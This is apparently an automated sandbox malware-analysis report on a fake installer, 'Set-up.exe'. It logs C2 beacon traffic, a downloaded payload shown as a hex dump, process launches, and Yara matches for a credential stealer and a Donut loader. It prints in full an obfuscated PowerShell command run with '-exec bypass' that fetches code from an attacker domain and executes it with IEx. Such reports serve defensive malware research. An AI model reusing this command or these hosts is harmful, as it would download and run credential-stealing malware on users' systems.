                                                                                                                                                                                              2025-01-05 17:08:30 UTC268OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 112
                                                                                                                                                                                              Host: shockingrefle.click
                                                                                                                                                                                              2025-01-05 17:08:30 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 45 32 31 39 31 46 33 45 31 43 43 32 34 41 35 35 30 45 45 43 42 43 45 44 34 30 38 42 39 31 41 43
                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=E2191F3E1CC24A550EECBCED408B91AC
                                                                                                                                                                                              2025-01-05 17:08:30 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:30 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=aua24ca0derorcaqsgrponhsrt; expires=Thu, 01 May 2025 10:55:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5H0Se8fdcAYNmaBNCwSBWqYZ%2F6WxfQspUo%2F7WXmq2OinjPx9sVhyVQUBNtKEtueYEiELBHPAcHWBtIfiqgnw8rLc9Qqhr9I%2FNs93QEpWYKZ4VFRsQ3bVIDh0I%2Fh3wZfEj5PHjG7U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd51218a8d542c8-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1593&rtt_var=604&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1016&delivery_rate=1800246&cwnd=225&unsent_bytes=0&cid=19da7e21b9c45a0a&ts=868&x=0"
                                                                                                                                                                                              2025-01-05 17:08:30 UTC218INData Raw: 64 34 0d 0a 62 74 69 74 4f 46 4a 43 42 35 58 52 61 6b 41 2b 72 43 32 35 4f 4b 36 70 59 74 6e 38 69 79 35 51 6a 34 34 4d 34 72 43 44 39 39 45 31 6f 34 39 4e 63 48 67 6c 2f 61 55 65 4d 45 32 57 63 5a 5a 6b 67 63 6f 48 76 6f 6d 6c 58 54 6a 67 2f 6c 44 4e 69 4c 62 41 35 56 7a 75 6e 77 78 6d 64 46 75 36 6f 51 4a 75 53 74 52 5a 6d 78 53 4d 7a 78 62 37 78 72 6b 43 63 75 71 73 4e 74 50 4e 72 34 7a 7a 47 2f 71 58 47 6a 6f 32 63 2b 57 69 55 42 77 52 38 41 4c 53 56 4d 66 5a 46 4b 79 52 34 6c 30 6c 35 71 42 2f 69 74 2f 7a 71 2f 34 48 74 74 6c 6e 4d 53 35 33 79 71 49 43 49 52 44 59 56 63 30 61 67 6f 73 45 72 64 36 78 48 6e 79 74 36 79 37 59 67 50 36 71 0d 0a
                                                                                                                                                                                              Data Ascii: d4btitOFJCB5XRakA+rC25OK6pYtn8iy5Qj44M4rCD99E1o49NcHgl/aUeME2WcZZkgcoHvomlXTjg/lDNiLbA5VzunwxmdFu6oQJuStRZmxSMzxb7xrkCcuqsNtPNr4zzG/qXGjo2c+WiUBwR8ALSVMfZFKyR4l0l5qB/it/zq/4HttlnMS53yqICIRDYVc0agosErd6xHnyt6y7YgP6q
                                                                                                                                                                                              2025-01-05 17:08:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              8192.168.2.449757185.161.251.214437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:31 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: cegu.shop
                                                                                                                                                                                              2025-01-05 17:08:31 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:31 GMT
                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                              Content-Length: 329
                                                                                                                                                                                              Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              ETag: "676c9e2a-149"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2025-01-05 17:08:31 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                              Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              9192.168.2.449758172.67.208.584437160C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-05 17:08:32 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: klipvumisui.shop
                                                                                                                                                                                              2025-01-05 17:08:32 UTC901INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 05 Jan 2025 17:08:32 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 8767044
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                              Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXB7b%2BTM7TNhLJEhU5o6oWg1C3kKoF0ZFDMGLoBB%2BizgzF1v8fc7pzvCmlbYHebpymTHOagSkGqUpmLqgAesojzdcX1Mi5KOuezSiEUkjfVtyrWkkamj6SoCkeND%2B1W2G0ok"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8fd51226b8ab429e-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1731&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=820&delivery_rate=1621321&cwnd=208&unsent_bytes=0&cid=8911a23a61b51207&ts=296&x=0"
                                                                                                                                                                                              2025-01-05 17:08:32 UTC468INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00
                                                                                                                                                                                              Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44
                                                                                                                                                                                              Data Ascii: HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@D
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73
                                                                                                                                                                                              Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClas
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00
                                                                                                                                                                                              Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e
                                                                                                                                                                                              Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00
                                                                                                                                                                                              Data Ascii: nstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67
                                                                                                                                                                                              Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d
                                                                                                                                                                                              Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=
                                                                                                                                                                                              2025-01-05 17:08:32 UTC1369INData Raw: 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70
                                                                                                                                                                                              Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCop


                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:12:08:05
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              File size:76'245'718 bytes
                                                                                                                                                                                              MD5 hash:17F0EA252818B24ED314F8A2443A4DE4
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1886496911.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1863772475.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1874172879.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1874509187.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                              Start time:12:08:31
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y
                                                                                                                                                                                              Imagebase:0xda0000
                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:12:08:31
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                              Start time:12:08:38
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe"
                                                                                                                                                                                              Imagebase:0xc80000
                                                                                                                                                                                              File size:8'767'044 bytes
                                                                                                                                                                                              MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 74%, ReversingLabs
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                              Start time:12:08:39
                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$F029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe"
                                                                                                                                                                                              Imagebase:0xd50000
                                                                                                                                                                                              File size:3'367'424 bytes
                                                                                                                                                                                              MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:Borland Delphi
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                              Start time:12:08:41
                                                                                                                                                                                              Start date:05/01/2025
